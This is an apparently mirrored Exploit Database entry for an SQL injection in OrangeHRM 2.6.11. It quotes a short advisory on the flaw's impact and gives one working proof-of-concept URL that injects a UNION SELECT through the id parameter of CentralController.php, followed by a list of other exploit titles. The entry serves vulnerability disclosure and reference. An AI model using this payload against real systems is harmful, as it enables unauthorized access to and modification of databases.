OrangeHRM 2.6.11 – ‘/lib/controllers/CentralController.php?id’ SQL Injection

Exploit Database
16 阅读

作者： High-Tech Bridge SA

日期： 2011-11-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36381/

source: https://www.securityfocus.com/bid/50857/info

OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected. 

http://www.example.com/lib/controllers/centralcontroller.php?capturemode=updatemode&uniqcode=NAT&id=1 %27%20union%20select%20version%28%29,user%28%29%20--%20

last Exploits
OrangeHRM 2.6.11 – ‘/lib/controllers/CentralController.php?id’ SQL Injection的更多信息

AirLive (Multiple Products) – OS Command Injection：
Microsoft Exchange 2019 – Unauthenticated Email Download：
School Event Attendance Monitoring System 1.0 – ‘Item Name’ Stored Cross-Site Scripting：
mySeatXT 0.1781 – SQL Injection：
Froxlor Froxlor Server Management Panel 0.10.16 – Persistent Cross-Site Scripting：
WordPress Theme XStore 9.3.8 – SQLi：
elproLOG MONITOR Webaccess 2.1 – Multiple Vulnerabilities：
Cloupia End-to-end FlexPod Management – Directory Traversal：